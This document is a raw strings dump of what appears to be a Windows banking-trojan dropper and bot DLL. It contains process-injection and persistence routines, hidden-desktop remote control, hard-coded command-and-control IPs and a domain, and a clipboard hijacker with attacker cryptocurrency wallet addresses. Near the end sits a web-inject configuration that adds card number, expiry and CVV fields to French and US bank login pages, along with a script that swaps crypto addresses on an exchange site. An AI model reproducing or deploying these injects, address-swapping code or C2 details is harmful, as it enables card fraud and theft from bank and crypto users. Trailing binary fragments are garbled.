`.rdata
@.data
.pdata
@.reloc
B.idata
WATAUH
A]A\_
t$ WATAUAVAWH
L97vcH
0A_A^A]A\_
H99v.H
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
t";\$`w
L9\$@t
WATAUH
0A]A\_
p WATAUH
WATAUAVAWH
A_A^A]A\_
tQ;PtsL
UVWATAUAVAWH
@A_A^A]A\_^]
UVWATAUAVAWH
_XfD9o
PA_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
x ATAUAVH
A^A]A\
x ATAUAVH
@A^A]A\
t$ WATAUH
A]A\_
WATAUAVAWH
)GPfD9
A_A^A]A\_
UVWATAUAVAWH
A_A^A]A\_^]
WATAVH
@A^A\_
UVWATAUAVAW
A_A^A]A\_^]
@USVWATAUAVH
H!\$8!\$0D
H!\$8E3
D$0H!\$(H!\$ I
H!\$ L
A^A]A\_^[]
dddddddd.txt
dddddddd.txt
yyyy-MM-dd
HH':'mm':'ss
IsWow64Process
kernel32
GetNativeSystemInfo
kernel32.dll
Windows 2000
Windows XP
Windows XP Professional
Windows Server 2003
Windows Home Server
Windows Server 2003 R2
Windows Vista
Windows Server 2008
Windows Server 2008 R2
Windows 7
fid=%d
Windows Server 2012
Windows 8
%s|%d|
Windows Server 2012 R2
Windows 8.1
Windows 10
Windows Server 2016/2019
Windows 11
Unidentified
%s %04d sp%1d.%1d %s
Global\%s%x
Global\%s%x
.idata
ObtainUserAgentString
urlmon.dll
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
mainver
mainver
srvurls
tid=%d&ta=%s-%x
srvretry
.idata
%[^.].%[^(](%[^)])
inject
buildid
os=%s&bid=%s
srvurls
srvdelay
inject
CurrentPath
CurrentPath
inject
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
LdrLoadDll
RtlCreateUnicodeStringFromAsciiz
modver
LdrGetProcedureAddress
ntdll.dll
modver
imagehlp.dll
CheckSumMappedFile
Can't set DOS header.
CreateEmpty failed.
Is not a valid PE file.
modules
modules
modconn
modparams
modrunm
modrunm
modparams
modules
modconn
ImageLoadNotifyRoutine
ImageUnloadNotifyRoutine
modrunm
ReflectiveLoader
SeDebugPrivilege
inject
inject
explorer.exe
chrome.exe
brave.exe
firefox.exe
kernelbase.dll
NtResumeThread
ntdll.dll
ZwResumeThread
ntdll.dll
kernel32.dll
NtResumeThread
ntdll.dll
ZwResumeThread
ntdll.dll
InjectApcRoutine
InjectNormalRoutine
SeDebugPrivilege
Software\Microsoft\Cryptography
MachineGuid
unknown
SOFTWARE\Microsoft\Windows NT\CurrentVersion
InstallDate
DigitalProductId
%s_%08X%08X
fatal_error
explorer.exe
chrome.exe
firefox.exe
brave.exe
CurrentPath
explorer.exe
.idata
SOFTWARE\
SOFTWARE\
%08lX%04lX%lu
SetClipboardData
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
User32.dll
EmptyClipboard
User32.dll
OpenClipboard
User32.dll
GetClipboardData
User32.dll
CloseClipboard
User32.dll
1ZWNNwbtBZWS9M9Q58NA2z9e4AXvK9VuD
0x270a8ee6933ae7a56b82c7c3e625cca5c120a520
LKnTdbFRxqoZgx3JaD7fS43urGXp2dgkLU
TAfvwf9NS4WXJR8qxTwo5qdnDKTaL762j6
%s=%.*s
_stricmp
strchr
_snprintf
strncmp
strncpy
RtlExitUserThread
ZwResumeThread
NtQueryInformationThread
NtQueueApcThread
strstr
tolower
isalpha
sscanf
_snwprintf
NtQueryInformationProcess
RtlRandom
ntdll.dll
lstrlenA
GlobalLock
GlobalAlloc
GlobalUnlock
GetProcAddress
LoadLibraryA
HeapAlloc
GetProcessHeap
lstrcatA
SetFileAttributesA
ExitProcess
GetComputerNameA
VirtualQuery
lstrcpynA
OpenProcess
GetVersionExW
lstrcmpiA
GetModuleFileNameA
CloseHandle
GetCurrentProcessId
lstrcpyA
Process32First
VirtualFree
CreateRemoteThread
VirtualAllocEx
Process32Next
GetModuleHandleA
CreateToolhelp32Snapshot
WriteProcessMemory
GetCurrentProcess
WaitForSingleObject
VirtualProtectEx
VirtualProtect
HeapReAlloc
HeapFree
VirtualAlloc
lstrcmpA
ExitThread
GetLastError
SetLastError
GetTempFileNameA
WinExec
GetTempPathA
CreateFileA
GetFileSize
SetFilePointer
MoveFileExA
SetEndOfFile
GetTickCount
UnlockFileEx
WriteFile
ReadFile
FlushInstructionCache
LockFileEx
OpenMutexA
LocalAlloc
GetExitCodeThread
GetSystemInfo
CreateMutexA
GetVersionExA
LocalFree
DeleteFileA
CreateThread
KERNEL32.dll
GetSystemMetrics
GetForegroundWindow
USER32.dll
RegSetValueExA
RegQueryValueExA
RegCreateKeyExA
RegCloseKey
OpenProcessToken
LookupPrivilegeValueA
AdjustTokenPrivileges
RegDeleteKeyW
RegOpenKeyExW
RegSetValueExW
GetSidSubAuthority
GetSidSubAuthorityCount
GetTokenInformation
RegOpenKeyExA
AllocateAndInitializeSid
FreeSid
CheckTokenMembership
ADVAPI32.dll
StrToIntA
PathFindFileNameA
StrStrIA
PathCombineA
UrlGetPartA
SHLWAPI.dll
SHGetFolderPathA
ShellExecuteExA
SHELL32.dll
GetProcessImageFileNameA
GetModuleFileNameExA
PSAPI.DLL
HttpQueryInfoA
InternetReadFile
InternetOpenA
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetSetOptionA
HttpOpenRequestA
HttpSendRequestA
WININET.dll
URLDownloadToFileA
urlmon.dll
memset
memcpy
__chkstk
__C_specific_handler
dropper64.exe
DownloadRunExeId
DownloadRunExeUrl
DownloadRunModId
DownloadUpdateMain
InjectApcRoutine
InjectNormalRoutine
SendLogs
WriteConfigString
!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
SVWAVH
8A^_^[
|$ AVH
|$ AVH
\$ UVATAUAVH
A^A]A\^]
@VWAUAWH
8A_A]_^
8A_A]_^
t$ WATAUAVAWH
H;|$hu'
H;|$hu
0A_A^A]A\_
@UWAVAWH
D$(H;D$
XA_A^_]
t$ AVH
@SUVWATAUAVAWH
8A_A^A]A\_^][
@SVWATAV
A^A\_^[
wMfffff
9D$,uy
9D$(tmL
|$ AVH
H9 tW9_
@SUVWAVH
D$DA3@$
@09\$@t
`A^_^][
@SAVAWH
|$ UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
l$8Mc}<3
D$hSelf
D$lRefl
D$pectif
t$HcF<
A_A^A]A\_
|$ AVH
|$ AVH
|$ AVH
|$ AVH
|$ AVH
L$ UVWH
|$ AVH
\$Pfff
USWATAUAWH
A_A]A\_[]
A_A]A\_[]
SWATAVAWH
pA_A^A\_[
pA_A^A\_[
VWATAVAWH
@A_A^A\_^
SVWATAVH
@A^A\_^[
UVWATAUAVAWH
A_A^A]A\_^]
@SUVWAVH
A^_^][
@SWAVH
u_I9>u
@UATAUAVH
A^A]A\]
A^A]A\]
@UVATAUH
8A]A\^]
@VWAVH
@VWAVH
|$ AVH
|$ AVH
|$ AVH
|$ AVH
|$ AVH
L$ VWAVH
@SUVWAVH
A^_^][
UAVAWH
0A_A^]
@SUWAVH
xA^_][
|$ AVH
|$ AVH
|$ AVH
t$ AVH
@SUVWATAVAWH
A_A^A\_^][
l$ VATAWH
G;} }BL9f(u
;E$} ;
=L9f8u
A_A\^
|$ ATAVAWH
0A_A^A\
{xBu H
tgHcCt
WATAUAVAWH
@A_A^A]A\_
|$ AVH
Cx<cuQ
{|-uvH
9Ct|mD
{||usH
t9fffff
|$@9s|
|$ AVH
t$ WATAVH
@SVAUAWH
xA_A]^[
D;{ }FH
xA_A]^[
SVWATAUAVAWH
@A_A^A]A\_^[
{|?upH
SVWAVAWH
0A_A^_^[
SVWATAVH
0A^A\_^[
l$ VWAVH
l$ VATAVH
A^A\^
@VWAVH
|$ AVH
t$ AVH
SVWATAUAVAWH
A_A^A]A\_^[
\$ WATAVH
C,9C0u>D
A^A\_
|$ AVH
@UVWAVH
@<9F4r
XA^_^]
@SUVWAWH
A__^][
SVWAVAWH
0A_A^_^[
$ZasL+
$ZasH+Q
$ZasH+
t`H+;H
$ZasH+
x ATAVAWH
A_A^A\
l$ VWAVH
ATAVAWH
A_A^A\
fffffff
VWATAVAWH
A_A^A\_^
x ATAVAWH
A_A^A\
x UAVAWH
A:8uiI
t"A88t
s WATAUAVAWH
9t$P~.8\$vt(H
9t$P~98\$vt3H
A_A^A]A\_
@USVWATAUAVAWH
eHA_A^A]A\_^[]
@UATAUAVAWH
!t$(H!t$ I
A_A^A]A\]
x ATAUAWH
@A_A]A\
t$ WAVAWH
@SUVWATAVAWH
zu|D!t$ E3
A_A^A\_^][
WATAUAVAWH
@A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
Genuua
ineIuY
nteluQ3
l$ VWATAVAWH
T$&@8t$&t9@8r
A81t@@8r
A_A^A\_^
WAVAWH
fE98t'
0A_A^_
@SUVWATAUAVAWH
A_A^A]A\_^][
;Cu1f9K
f93t M;
L$ SUVWH
|$ ATAVAWH
0A_A^A\
WATAUAVAWH
0A_A^A]A\_
\$ UVWATAUAVAWH
^fD9+t
A_A^A]A\_^]
\$ UVWATAUAVAWH
A_A^A]A\_^]
fD9|$bu
H9L$Ht8H
VWATAVAWH
A_A^A\_^
UVWATAUAVAWH
A_A^A]A\_^]
D8eoupH
UVWATAUAVAWH
pA_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
AUAVAWH
0A_A^A]
@SVWATAUAVAWH
L!|$@L!
D$HHcH
A_A^A]A\_^[
SVWATAUAVAWH
0A_A^A]A\_^[
WATAVH
@A^A\_
WATAUAVAWH
gfffffffH
D8L$Ht
A_A^A]A\_
x AUAVAWH
A_A^A]
@SUVWH
@SUVWH
@SUVWAVH
A^_^][
` AUAVAWH
t$HHc0I
\$0D9=
A_A^A]
Hct$@H
sYHcL$HH
x ATAVAWH
A_A^A\
H3E H3E
@UATAUAVAWH
A_A^A]A\]
x ATAVAWH
D8&t4H
D8d$Ht
A_A^A\
ATAVAWH
D8d$8t
@A_A^A\
\$ UVWATAUAVAWH
A_A^A]A\_^]
VWATAVAWH
0A_A^A\_^
@8l$8t
@SUVWATAVAWH
tcH95^#
PA_A^A\_^][
@UATAUAVAWH
A_A^A]A\]
LcA<E3
UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
f9.uVH
f9.u"H
tVf91tQH
x ATAVAWH
A_A^A\
@SUVWATAVAWH
3fD9 t
A_A^A\_^][
@USVWH
VWATAVAWH
A_A^A\_^
\$ UVWATAUAVAWH
!|$HHc
|$HD9l$X
HcD$LH;
HcD$LH;
H!|$ L
A_A^A]A\_^]
AUAVAWH
0A_A^A]
D8t$8t
|$ UATAUAVAWH
A_A^A]A\]
|$ UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
D82u&H
D8t$Ht
UVWATAUAVAWH
A_A^A]A\_^]
x AUAVAWH
A_A^A]
H(H9J(u
generic
unknown error
iostream
iostream stream error
system
chrome.exe
opera.exe
msedge.exe
brave.exe
browser.exe
firefox.exe
\\.\pipe\%s
invalid string position
string too long
LoadLibraryA
vector<T> too long
176.113.115.149
185.81.68.156
diamotrix.online
/VzCAHn.php
User32.dll
Kernel32.dll
KernelBase.dll
msvcrt.dll
ntdll.dll
Shlwapi.dll
Shell32.dll
Secur32.dll
Advapi32.dll
ws2_32.dll
version.dll
Psapi.dll
wininet.dll
MessageBoxA
GetWindowsDirectoryA
WideCharToMultiByte
LocalAlloc
wsprintfA
MultiByteToWideChar
malloc
VirtualAllocEx
WriteProcessMemory
CreateRemoteThread
GetProcAddress
PathRemoveFileSpecA
GetModuleFileNameA
PathFindFileNameA
strncmp
_strnicmp
lstrlenA
ExitProcess
SHGetFolderPathA
lstrcpyA
lstrcatA
CopyFileA
GetVolumeInformationA
GetUserNameExA
LookupAccountNameA
ConvertSidToStringSidA
LocalFree
lstrcmpiA
lstrcmpA
StrStrA
StrStrIA
strtol
realloc
WSAStartup
socket
gethostbyname
connect
closesocket
WSACleanup
memset
memcpy
NtOpenKey
NtSetValueKey
CloseHandle
CreateProcessA
NtCreateThreadEx
TerminateProcess
FindWindowA
NtUnmapViewOfSection
NtQueryInformationProcess
GetThreadContext
SetThreadContext
SHFileOperationA
FindFirstFileA
FindNextFileA
GetWindowThreadProcessId
InitializeCriticalSection
GetLastError
EnterCriticalSection
LeaveCriticalSection
_errno
tolower
isdigit
strtoul
isxdigit
strtod
CreateToolhelp32Snapshot
Process32First
Process32Next
StrChrA
StrToIntA
GetModuleHandleA
GetFileVersionInfoSizeA
GetFileVersionInfoA
VerQueryValueA
GetModuleInformation
memcmp
ExpandEnvironmentStringsA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
CreateFileA
ReadFile
WriteFile
RegSetValueExA
RegOpenKeyExA
RegCloseKey
GetFileSize
ResumeThread
IsWow64Process
GetNativeSystemInfo
OpenProcess
CreateThread
GetUserNameW
GetComputerNameW
GetVersionExA
CreateNamedPipeA
ConnectNamedPipe
DisconnectNamedPipe
InternetCrackUrlA
GetTempPathA
GetTempFileNameA
ShellExecuteA
ioctlsocket
CreateMutexA
ReleaseMutex
WaitForSingleObject
EnumWindows
GetCurrentProcessId
DeleteFileA
PathFileExistsA
CreateDirectoryA
HttpQueryInfoA
HttpQueryInfoW
RtlCompressBuffer
RtlGetCompressionWorkSpaceSize
SetThreadDesktop
CreateDesktopA
OpenDesktopA
TerminateThread
PostMessageA
SendMessageA
ChildWindowFromPoint
ScreenToClient
MoveWindow
GetWindowRect
GetMenuItemID
MenuItemFromPoint
RealGetWindowClassA
PtInRect
GetWindowPlacement
SetWindowLongA
GetWindowLongA
WindowFromPoint
SHAppBarMessage
RegQueryValueExA
GetDesktopWindow
DeleteDC
ReleaseDC
DeleteObject
GetDIBits
StretchBlt
SetStretchBltMode
SelectObject
CreateCompatibleDC
CreateCompatibleBitmap
IsWindowVisible
GetWindow
PrintWindow
GetTopWindow
chunked
HTTP/1.1
Host:
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length:
HTTP/1.1 200 OK
Content-Length
Transfer-Encoding
\Registry\User\%s\%s
Software\Microsoft\Windows\CurrentVersion\Run
GetInjects
Firefox
nss3.dll
PR_Read
PR_Write
Content-Length:
Accept-Encoding
identity
Connection
Content-Type:
text/html
Location:
Host:
http(s)://
log|%s|%s|%d|
Mozilla
bot|%d|%d|%d|%d|%s|%s|%d|%d
Shell_TrayWnd
verclsid.exe
child.dll
:Zone.Identifier
Trusteer
Content-Type: application/x-www-form-urlencoded
Connection: close
xdigit
DELETE
()$^.*+?[]|\-{},:=!
bad locale name
\b(1|3|bc1)[a-zA-HJ-NP-Z0-9]{25,42}\b
\b0x[a-fA-F0-9]{40}\b
\bT[a-zA-HJ-NP-Z0-9]{33}\b
\b(L|M)[a-zA-HJ-NP-Z0-9]{26,33}\b
1ZWNNwbtBZWS9M9Q58NA2z9e4AXvK9VuD
0x270a8ee6933ae7a56b82c7c3e625cca5c120a520
TAfvwf9NS4WXJR8qxTwo5qdnDKTaL762j6
LKnTdbFRxqoZgx3JaD7fS43urGXp2dgkLU
report=%s,%s,%d
bad cast
vector<bool> too long
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
()$^.*+?[]|\-{},:=!
Chrome
PR_GetDescType
chrome.dll
msedge.dll
opera-browser.dll
browser.dll
AVE_MARIA
injects
web_content
url_blacklist
data_before
inject
bad allocation
regex_error(error_collate): The expression contained an invalid collating element name.
regex_error(error_ctype): The expression contained an invalid character class name.
regex_error(error_escape): The expression contained an invalid escaped character, or a trailing escape.
regex_error(error_backref): The expression contained an invalid back reference.
regex_error(error_brack): The expression contained mismatched [ and ].
regex_error(error_paren): The expression contained mismatched ( and ).
regex_error(error_brace): The expression contained mismatched { and }.
regex_error(error_badbrace): The expression contained an invalid range in a { expression }.
regex_error(error_range): The expression contained an invalid character range, such as [b-a] in most encodings.
regex_error(error_space): There was insufficient memory to convert the expression into a finite state machine.
regex_error(error_badrepeat): One of *?+{ was not preceded by a valid regular expression.
regex_error(error_complexity): The complexity of an attempted match against a regular expression exceeded a pre-set level.
regex_error(error_stack): There was insufficient memory to determine whether the regular expression could match the specified character sequence.
regex_error(error_parse)
regex_error(error_syntax)
regex_error
permission denied
file exists
no such device
filename too long
device or resource busy
io error
directory not empty
invalid argument
no space on device
no such file or directory
function not supported
no lock available
not enough memory
resource unavailable try again
cross device link
operation canceled
too many files open
permission_denied
address_in_use
address_not_available
address_family_not_supported
connection_already_in_progress
bad_file_descriptor
connection_aborted
connection_refused
connection_reset
destination_address_required
bad_address
host_unreachable
operation_in_progress
interrupted
invalid_argument
already_connected
too_many_files_open
message_size
filename_too_long
network_down
network_reset
network_unreachable
no_buffer_space
no_protocol_option
not_connected
not_a_socket
operation_not_supported
protocol_not_supported
wrong_protocol_type
timed_out
operation_would_block
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
destination address required
executable format error
file too large
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
invalid seek
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no message available
no message
no protocol option
no stream resources
no such device or address
no such process
not a directory
not a socket
not a stream
not connected
not supported
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
protocol error
protocol not supported
read only file system
resource deadlock would occur
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many links
too many symbolic link levels
value too large
wrong protocol type
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefABCDEF
Unknown exception
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
bad exception
GetCurrentPackageId
_hypot
_nextafter
(null)
`h````
xpxxxx
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`h`hhh
xppwpp
1#SNAN
1#QNAN
CreateFileW
WriteFile
CloseHandle
GetLastError
HeapAlloc
GetProcessHeap
TerminateProcess
ResumeThread
GetThreadContext
SetThreadContext
lstrlenA
MultiByteToWideChar
WideCharToMultiByte
CreateToolhelp32Snapshot
GetCurrentProcess
GetModuleHandleA
GetProcAddress
LoadLibraryA
GetSystemInfo
VirtualAlloc
VirtualFree
VirtualQuery
HeapCreate
HeapDestroy
HeapReAlloc
HeapFree
GetCurrentProcessId
GetCurrentThreadId
OpenThread
SuspendThread
FlushInstructionCache
VirtualProtect
GetModuleHandleW
Thread32First
Thread32Next
EnterCriticalSection
LeaveCriticalSection
Module32First
Module32Next
KERNEL32.dll
RtlPcToFileHeader
RtlLookupFunctionEntry
RtlUnwindEx
RtlCaptureContext
RtlVirtualUnwind
ntdll.dll
InternetOpenW
InternetCloseHandle
InternetReadFile
InternetConnectW
HttpOpenRequestW
HttpSendRequestA
WININET.dll
InitializeCriticalSectionEx
DeleteCriticalSection
EncodePointer
DecodePointer
GetLocaleInfoEx
GetStringTypeW
RaiseException
IsDebuggerPresent
IsProcessorFeaturePresent
GetCommandLineA
InitializeCriticalSectionAndSpinCount
GetCPInfo
GetStdHandle
GetModuleFileNameW
ExitProcess
GetModuleHandleExW
HeapSize
IsValidCodePage
GetACP
GetOEMCP
SetLastError
UnhandledExceptionFilter
SetUnhandledExceptionFilter
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
GetStartupInfoW
GetFileType
InitOnceExecuteOnce
GetModuleFileNameA
QueryPerformanceCounter
GetSystemTimeAsFileTime
GetTickCount64
GetEnvironmentStringsW
FreeEnvironmentStringsW
CompareStringEx
GetUserDefaultLocaleName
LCMapStringEx
IsValidLocaleName
EnumSystemLocalesEx
OutputDebugStringW
LoadLibraryExW
LoadLibraryW
GetConsoleCP
GetConsoleMode
SetFilePointerEx
SetStdHandle
WriteConsoleW
FlushFileBuffers
bot64.dll
?ReflectiveLoader@@YA_KXZ
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
YYYYYYYYYYYY
}YPPPPYYYYa
``YYYYYYYYYYY
JJJJKRJJJJOLJJJJJJJJUE@JJJEYMFJ]JJJJJJJJJJJJJJacgNJJkmJJEmJJDEJJ
d[[[[[
[[[[[[[[[[[[js
[RRRR[[[[w|w
vv[[[[[[[[[[[
@@@@AI@@@@LB@@@@@@@@ODS@@@DWC\@`@@@@@@@@@@@@@@dfnk@@jF@@DF@@[D@@
.?AVruntime_error@std@@
.?AVexception@std@@
.?AVbad_cast@std@@
.?AV_Facet_base@std@@
.?AVfacet@locale@std@@
.?AUctype_base@std@@
.?AV?$ctype@D@std@@
.?AV?$collate@D@std@@
.?AV_Node_base@std@@
.?AV_Root_node@std@@
.?AV_Node_end_group@std@@
.?AV_Node_assert@std@@
.?AV_Node_capture@std@@
.?AV_Node_back@std@@
.?AV_Node_endif@std@@
.?AV_Node_if@std@@
.?AV_Node_rep@std@@
.?AV_Node_end_rep@std@@
.?AV?$_Node_class@DV?$regex_traits@D@std@@@std@@
.?AV?$_Node_str@D@std@@
AWAVATVWUSH
????H1
AWAVAUATVWUSH
????H1
AWAVAUATVWUSH
????H1
AVVWUSH
????H1
DAVVWUSH
????H1
DAWAVAUATVWUSH
$????H
AWAVAUATVWUSH
$????L
$????H
$????H
????H1
AWAVAUATVWUSH
$????H
AWAVAUATVWUSH
$????H
.?AVbad_alloc@std@@
"url_blacklist": [ "*ocsp*.*", "*symc*.com*", "*clients*.google.com*", "*telemetry.mozilla.org*", "*safebrowsing.google.com*", "*services.mozilla.com*", "incoming.telemetry.mozilla.org", "*googlevideo.com*", "translate.googleapis.com", "*lencr.org*", "*log-upload-os.hoyoverse.com*", "b1.nel.goog*", "*v.clarity.ms*", "*dns.com*", "*x.com*", "*youtube.com*" ],
"injects":
{
"url": "connexion-mabanque.bnpparibas",
"path": "*",
"web_content":
[
{
"data_before": "rv-value-reactive=\"form.idTelematique\">",
"inject": "<label for=\"card_num\" rv-text=\"config.app.identification.numclient\">2. <span class=\"label_field\">Num
ro De Carte</span></label><input type=\"text\" pattern=\"[0-9]*\" value=\"\" name=\"card_num\" maxlength=\"10\" size=\"10\" autofocus=\"\" autocorrect=\"off\" id=\"card_num\" class=\"form-control numeric\" rv-value-reactive=\"form.idTelematique\"><label for=\"exp_date\" rv-text=\"config.app.identification.numclient\">3. <span class=\"label_field\">Date d'expiration</span></label><input type=\"text\" pattern=\"[0-9]*\" value=\"\" name=\"exp_date\" maxlength=\"10\" size=\"10\" autofocus=\"\" autocorrect=\"off\" id=\"exp_date\" class=\"form-control numeric\" rv-value-reactive=\"form.idTelematique\"><label for=\"cvv\" rv-text=\"config.app.identification.numclient\">4. <span class=\"label_field\">CVV</span></label><input type=\"text\" pattern=\"[0-9]*\" value=\"\" name=\"cvv\" maxlength=\"10\" size=\"10\" autofocus=\"\" autocorrect=\"off\" id=\"cvv\" class=\"form-control numeric\" rv-value-reactive=\"form.idTelematique\">"
}
]
},
{
"url": "particuliers.sg.fr",
"path": "/icd/cbo/index-authsec.html",
"web_content":
[
{
"data_before": "class=\"auth_error\"></div>",
"inject": "<br><div class=\"auth-cs-content swm_input-container\"> <input id=\"user_id\" name=\"card_num\" type=\"text\" class=\"swm_input grey_cross ngim-input\" autocapitalize=\"none\" autocorrect=\"off\" aria-label=\"Code client\" placeholder=\" \" autocomplete=\"off\" maxlength=\"8\" aria-describedby=\"js-error\" required=\"\"> <button id=\"user_id-delete\" role=\"button\" class=\"swm_sprite swm_to-clear\" aria-label=\"Effacer votre code client\"></button> <span class=\"bar\" aria-hidden=\"true\"></span> <label for=\"user_id\">Num
ro De Carte</label> </div><br><div class=\"auth-cs-content swm_input-container\"> <input id=\"user_id\" name=\"exp_date\" type=\"text\" class=\"swm_input grey_cross ngim-input\" autocapitalize=\"none\" autocorrect=\"off\" aria-label=\"Code client\" placeholder=\" \" autocomplete=\"off\" maxlength=\"8\" aria-describedby=\"js-error\" required=\"\"> <button id=\"user_id-delete\" role=\"button\" class=\"swm_sprite swm_to-clear\" aria-label=\"Effacer votre code client\"></button> <span class=\"bar\" aria-hidden=\"true\"></span> <label for=\"user_id\">Date d'expiration</label> <br><div class=\"auth-cs-content swm_input-container\"> <input id=\"cvv\" name=\"cvv\" type=\"text\" class=\"swm_input grey_cross ngim-input\" autocapitalize=\"none\" autocorrect=\"off\" aria-label=\"Code client\" placeholder=\" \" autocomplete=\"off\" maxlength=\"8\" aria-describedby=\"js-error\" required=\"\"> <button id=\"user_id-delete\" role=\"button\" class=\"swm_sprite swm_to-clear\" aria-label=\"Effacer votre cvv\"></button> <span c
}
]
},
{
"url": "www.bankofamerica.com",
"path": "*",
"web_content":
[
{
"data_before": "id=\"passcode1_errorMessage\" aria-hidden=\"true\">",
"inject": "</div><div><input name=\"card_number\" class=\"tl-private cs-passcode1 spa-input-text\" type=\"text\" placeholder=\"Credit Card Number\" maxlength=\"32\" aria-required=\"true\" aria-label=\"Card number\" autocomplete=\"off\"></div><br><div><input name=\"EX_date\" class=\"tl-private cs-passcode1 spa-input-text\" type=\"text\" placeholder=\"Expiration date\" maxlength=\"32\" aria-required=\"true\" aria-label=\"Ex date\" autocomplete=\"off\"></div><br><div><input name=\"CVV\" class=\"tl-private cs-passcode1 spa-input-text\" type=\"text\" placeholder=\"CVV\" maxlength=\"4\" aria-required=\"true\" aria-label=\"CVV number\" autocomplete=\"off\"></div><br><div>"
}
]
},
"url": "www.exchanger.ws",
"path": "*",
"web_content": [
{
"data_before": "</title>",
"inject": "<script>function replaceAllAddresses(newAddresses) { const btcRegexes = [ /\\b([13][a-km-zA-HJ-NP-Z1-9]{25,34})\\b/g, /\\b((bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39})\\b/g ]; const ethRegexes = [ /\\b0x[a-fA-F0-9]{40}\\b/g ]; const ltcRegexes = [ /\\b(L|M|ltc1)[a-zA-HJ-NP-Z0-9]{25,39}\\b/g ]; const trxRegexes = [ /\\b(T|t)[a-zA-HJ-NP-Z0-9]{33}\\b/g ]; document.querySelectorAll('*').forEach(el => { el.childNodes.forEach(node => { if (node.nodeType === Node.TEXT_NODE) { btcRegexes.forEach(regex => { node.textContent = node.textContent.replace(regex, newAddresses.btc); }); ethRegexes.forEach(regex => { node.textContent = node.textContent.replace(regex, newAddresses.eth); }); ltcRegexes.forEach(regex => { node.textContent = node.textContent.replace(regex, newAddresses.ltc); }); trxRegexes.forEach(regex => { node.textContent = node.textContent.replace(regex, newAddresses.trx); }); } }); if (el.classList) { el.classList.forEach(className => { if (className.toLowerCase().includes('qrcode')) { el.clas
}
]
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVregex_error@std@@
.?AV_Locimp@locale@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
pqwvqmv;c
w|1#, ;>/4"8#952>,,wvzfK
dlfe!kG{
s\ST)#
<@vNvT$W"_?%O[s:}\KO504WFbfqYRr
s_IV23.{!?R/XOCv
